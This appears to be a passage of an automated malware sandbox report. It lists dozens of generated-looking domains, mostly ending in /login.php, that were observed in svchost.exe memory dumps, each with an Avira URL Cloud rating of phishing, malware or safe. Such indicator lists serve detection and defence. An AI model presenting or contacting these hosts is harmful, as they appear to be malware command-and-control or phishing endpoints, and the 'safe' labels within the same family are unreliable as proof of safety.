                                                                                                                                                                                                            http://qexyfuq.com/login.phpsvchost.exe, 00000001.00000003.2561990237.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2832397817.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2828658186.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2556143738.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574290902.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2826870252.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2827527666.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2832232982.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2827400393.000000000BE82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gaqycow.com/login.phpsvchost.exe, 00000001.00000003.2599492010.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2590376804.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2586469836.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2589232221.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2586469836.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612044632.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qebyqeq.com/login.phpsvchost.exe, 00000001.00000003.2821289704.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535357779.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574433458.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2536562321.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2824083108.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2557983438.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2546077981.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535691969.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535691969.000000000735E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lyryled.com/login.phpsvchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770480455.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483930965.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2477822370.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770976784.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2782047194.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483798892.000000000721B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771679964.0000000007337000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2766393169.0000000007234000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qexyvoq.com/login.phpsvchost.exe, 00000001.00000003.2799485935.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508205783.000000000724F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800682376.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794121889.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508047808.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519971572.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518439898.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508663106.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519517368.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505929532.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800540178.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2504504034.0000000007239000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2791148605.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505675596.0000000007241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800431659.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507383572.000000000724E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lymyner.com/login.phpsvchost.exe, 00000001.00000003.2799485935.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2506872369.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800682376.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794121889.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794122039.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505929532.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800540178.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2792642908.0000000007252000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2791148605.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2795311050.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505104494.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508379091.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507273692.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2504460541.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800431659.00000000072F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qekyfeg.com/svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2484051841.000000000BE25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gacyhez.com/login.phpsvchost.exe, 00000001.00000003.2819905247.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2825246973.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2532568481.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2823353061.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822601905.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822384079.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2823512755.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2824083108.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2534538085.00000000072F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vowyrym.com/login.phpsvchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483450867.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2494447940.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483592677.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771944825.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767985121.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2502438422.000000000724D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771843831.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2494764466.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2477371501.0000000007252000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2763215770.00000000072A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gahyvab.com/login.phpsvchost.exe, 00000001.00000003.2613993664.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lygyvar.com/svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771944825.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767985121.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2484051841.000000000BE25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lygytyd.com/login.phpsvchost.exe, 00000001.00000003.2506872369.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505929532.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518441386.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505104494.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2793548404.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508379091.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507273692.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2504460541.000000000734F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://pufytip.com/login.phpsvchost.exe, 00000001.00000003.2573059018.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570797195.0000000005F1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qedyhyl.com/login.phpsvchost.exe, 00000001.00000003.2809672736.0000000005F9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518500900.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520694220.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520541717.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2802658377.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519802844.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519384142.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2803364591.0000000005F9C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://pujyteq.com/login.phpsvchost.exe, 00000001.00000003.2799485935.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800682376.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794121889.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2793808269.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505929532.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800540178.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2791148605.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518441386.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507273692.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800431659.00000000072F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vojyduf.com/login.phpsvchost.exe, 00000001.00000003.2574085789.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535357779.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571204681.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2824083108.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535691969.000000000735E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://volydyk.com/svchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2827400393.000000000BE82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gatykyh.com/login.phpsvchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2832397817.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2828658186.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2557275920.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2826870252.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2827527666.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2832232982.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2556143738.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2827400393.000000000BE82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://pujygaq.com/svchost.exe, 00000001.00000003.2815248355.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815248355.00000000072DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815952553.00000000072E0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2814952372.000000000724D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qetyvil.com/login.phpsvchost.exe, 00000001.00000003.2815248355.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2809672736.0000000005F9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815757354.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2524978481.000000000734D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808677418.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2533383736.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523370839.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2811252101.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2814479202.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2809428252.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2522775784.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808839398.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523240921.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523606627.00000000073B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vofypam.com/login.phpsvchost.exe, 00000001.00000003.2556595086.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2562078765.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2554327185.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2556143738.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2552572021.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2561801685.0000000007345000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vowykaf.com/login.phpsvchost.exe, 00000001.00000003.2477919683.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770480455.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483930965.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770976784.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771944825.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767985121.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483798892.000000000721B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gadyniw.com/login.phpsvchost.exe, 00000001.00000003.2646318980.0000000005F7E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2646317504.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2708292278.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2736488902.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2636466156.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1771501878.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2636915993.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2701886628.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2640990048.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2628700713.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1797346749.000000000724A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qegyval.com/login.phpsvchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483592677.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770976784.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771944825.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767985121.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2494764466.0000000007389000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lysynaj.com/login.phpsvchost.exe, 00000001.00000003.2809672736.0000000005F9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528463448.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2811252101.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528177769.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523070283.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2809428252.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528332201.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2522775784.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808839398.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523240921.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2810277870.000000000721B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gaqyres.com/login.phpsvchost.exe, 00000001.00000003.2613993664.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980870910.000000000733C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2855137197.0000000005F1D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867450379.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2613157948.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lyvymir.com/login.phpsvchost.exe, 00000001.00000003.2477919683.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2502330096.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483450867.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2494447940.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508379091.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770227198.000000000BE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505104494.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2506872369.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771944825.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767985121.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2768207136.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2506229703.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505999102.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2504460541.000000000735E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lyxygur.com/login.phpsvchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2613424581.000000000734D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2613994929.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612044632.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2611837794.0000000007334000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
